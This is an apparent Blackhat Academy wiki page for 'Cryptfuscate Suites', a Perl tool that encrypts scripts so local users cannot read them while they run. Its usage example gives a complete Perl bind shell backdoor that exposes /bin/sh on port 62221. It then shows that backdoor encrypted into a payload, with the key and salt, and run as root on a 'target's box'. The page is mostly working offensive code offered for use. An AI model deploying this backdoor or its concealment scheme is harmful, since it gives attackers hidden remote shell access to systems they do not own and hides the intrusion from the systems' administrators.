User:Haqaholiq/Cryptfuscate-Suites
|
Neither Blackhat Academy staff or the author are responsible, in any way, for the way in which you use this application pack. |
Description
Cryptfuscate Suites is a package of applications that allow you to keep your Perl source code from being discovered by local users even while being executed. Cryptfuscate Suites creates and executes encrypted perl modules embedded in a text file. Cryptfuscate uses the Blowfish algorithm with Cipher-block chaining to encrypt cyrptfuscate modules. These modules can in turn be executed by Cryptfuscate Suites' Executer keeping your Perl source code secure. Cryptfuscate Suites is a faster and more time consuming alternative to Perl source code obfuscation. It also is an alternative to fussing with perl2exe.
Modules
- cryptfuscate.pl - encrypts perl modules embedded in text files to be executed by executer.pl
- executer.pl - executes perl modules embedded in 'cryptfuscated' text files.
Download & Installation
Choose to download as tar or zip file, unpackage Cryptfuscate Suites, and start using.
Usage
Below is an example of a bind shell module for Cryptfuscate Suites:
use strict; print " [*] Setting Up Bind Shell on Port 62221...\n"; my $system = '/bin/sh'; my $port = 62221; use IO::Socket::INET; socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die " [*] Could not setup backdoor...\n"; setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die " [*] Could not setup backdoor...\n"; bind(SOCK, sockaddr_in($port, INADDR_ANY)) or die " [*] Could not setup backdoor...\n"; print " [*] Done.\n"; listen(SOCK, SOMAXCONN) or die " [*] Could not setup backdoor...\n"; while(1){ accept(CSOCK, SOCK); if(!(my $pid = fork)){ send(CSOCK, "[*] Connected...\n", 0); # Build interactive shell open(*STDIN, ">&CSOCK"); open(*STDOUT, ">&CSOCK"); open(*STDERR, ">&CSOCK"); system($system); close(*STDIN, *STDOUT, *STDERR); } |
We will name this module bd.txt. (This module can be found on github with the rest of the source.)
Now let's use cryptfuscate.pl to create a encrypted version of bd.txt to use as a payload for executer.pl:
haqaholiq@blackhatacademy$ ./cryptfuscate.pl Plaintext Module Path: bd.txt Encrypted Module Path: payload.txt Encryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d Salt: 19324953 [*] Text file encrypted successfully...
Our encrypted version of bd.txt (payload.txt):
U2FsdGVkX18xOTMyNDk1M8JxfiMccqAr+/FkJf415yyn3xLW3hr1P42zo+eqNB2ec5H+21ve08Cq i9g01PaB/Y0+dEfZKfhZN1ecPgBk9W27sB+z8GG+zNrVnh6kFRIMWNH67yPp7lohB/u0rvt6UkoQ QV2c4SoY1KGw5307m8XXqm4NEkRUlVAbU2/u7+u8F/GNA//OX7zJ4ygPacb5dQfGjKxhVRwruVbf qIxVSNPAK+BjsbKDp/FRL1is3+V48ZRz0vpihXFJyHf7gxuCPMHxDoHMTYefwvRZ1JFhpGANtmj4 +wDvcqDBfk+y6yl0BkeqJTKeoweWeJLf5Vfe4OyUMlngc+pBY1SeYfzdnFEH3VUr/hx8yZ0BQlWR EtdvJJrT652EOS0zS5whZD8d3cRU8eP9yTOqfhz+L5jeIt/zVfVVx2hcCdNMEE64AQ6mXE4AIDy/ k2igd8KskDq1P/H1HHMpnr3ru+YPg1L+WVU2EhfytHjPehu2CQsunhguzoqE0Sqvoj3sMiDSchfM +MBul0G4H+5a2Nsq9PE5w0nxXcbu/M/e12aE+n9/GAZnvXO7jmP11/f1GGqhcuQ99bgg70IXXVCY /P+9ccxTJTNrTFNVj983vYD0orQwrM3BxbmgJPvNU9Vqcfo/voGDt7cWTTNgXMg3hjx9OdL5Hd5K iSq+/QwtZGCMkhV3dEmxBU2qIE/HEkbnbJEGK/UoYhlLasBI9NAk0CMUHaHs7IcS41jgRSHX6hRR 9R8b6WIWyO2ByfR7F/rOl0k3wrDhfMfYOrfXdOzVfiexDBUsZ33ZgC+qwIl2XsAoBw++4wBLWOK7 AmxIkk6pmbioXOFDC36Wk0QvRHU7eYQ4O2LSUIfxW90II+Z0u0GW2wP+lg/SxHO8sv2Dyl66HD9P wcOsRA0xuOztsmoMdpqQFUs+pT6nzezX2/OMZm3BB9Wqm5HdUp0zMq3xx1tbwmRIlUY3NW7Y4LEk NBtACZ6CSuFiCACDvAW9WAIVSCE1O3B70dN+jJFiFt1zTjugzrGgyU/aAZYEDzJLa9QRkZl/B9t1 jApfMz2gh5VGlXGKQBV6rCK16t8y/SixbvO95syMitHBVG1+sCGSweuKf6Ogfq+DS3DdNzLwKMPW zWvyCO/q/BlUq0/aEEutep2igD7sBcfS4y+XrrOz+EKXuh8SKKn209URvkg2DjLUxZmnybDg5b/Y 7CiCfGOvGpA8LGxlGUnVul4ezyJW9wftCsroDvad/Ka/9nJx0Y1npzazsPtkryjVgvlXB6bTVyj8 IlUCkQzGi+LT9xwHZrRBZ/YWerj8C5x3fSu/sC8qCjtIqL7NTVxo |
Next pack payload.txt with executer.pl and place on your target's box. Untar and your ready to go execute your module using executer.pl:
root@targetbox$ ./executer.pl Encrypted Module Path: payload.txt Decryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d Salt: 19324953 [*] Executing payload... [*] Setting Up Bind Shell on Port 62221... [*] Done.
We have successfully ran our encrypted bind shell payload on port 62221. The source of our payload is completely encrypted making it impossible for local users to view the source code without knowing the correct encryption key and salt.
